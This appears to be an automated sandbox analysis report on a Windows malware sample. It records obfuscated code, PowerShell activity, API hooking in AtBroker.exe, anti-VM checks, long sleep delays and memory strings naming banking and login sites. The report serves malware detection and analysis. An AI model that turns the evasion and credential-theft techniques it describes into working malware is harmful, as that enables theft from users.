Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, RHNmQRFJ7IeyjCUSgNl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tnhdRayvYI', 'rt5dMyOGMh', 'qKddrlSrIr', 't60ddLJNKB', 'lD0dEdHSML', 'EtZdLwy0P3', 'vBgd0WHxXQ'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, MKjvlhJ4S0GRiRqx2I.cs	High entropy of concatenated method names: 'rLlFwrN5As', 'uF4FHywHvN', 'Q5bFsc97vh', 'W9hFhdHLFl', 'xuxFerOOh7', 'dghFT0LOBO', 'qF4ALT4jgjdrcA39y6', 'JQnQhrrrYYReI6C1VQ', 'ctdVS3J8xVmN8oAREq', 'ODyFFERieN'
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, qBhCLflaDUBFEZ39UF.cs	High entropy of concatenated method names: 'IoHMVbEPDW', 'YIyM9ohxdc', 'CgaMj3GVRv', 'dMrMwQFDAg', 'MecMRsEg5B', 'hCrMHViA6C', 'Next', 'Next', 'Next', 'NextBytes'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: qxXd7JaCvGdKUp8.exe PID: 2452, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Memory allocated: B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Memory allocated: 2610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Memory allocated: 24C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Memory allocated: 7190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Memory allocated: 8190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Memory allocated: 8330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Memory allocated: 9330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Memory allocated: 9D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Memory allocated: AD40000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

Code function: 6_2_0125096E rdtsc

6_2_0125096E

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6484	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2604	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Window / User API: threadDelayed 9654	Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\AtBroker.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe TID: 5972	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1352	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4568	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6200	Thread sleep count: 318 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6200	Thread sleep time: -636000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6200	Thread sleep count: 9654 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6200	Thread sleep time: -19308000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe TID: 6516	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\AtBroker.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\AtBroker.exe

Code function: 10_2_004CC730 FindFirstFileW,FindNextFileW,FindClose,

10_2_004CC730

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: c6Sz--24-.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: c6Sz--24-.10.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: c6Sz--24-.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: c6Sz--24-.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: c6Sz--24-.10.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: c6Sz--24-.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: iKfhbNmgVEQKZlbl.exe, 0000000B.00000002.3322325833.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: c6Sz--24-.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: c6Sz--24-.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: c6Sz--24-.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: c6Sz--24-.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: c6Sz--24-.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: c6Sz--24-.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: c6Sz--24-.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: c6Sz--24-.10.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: c6Sz--24-.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
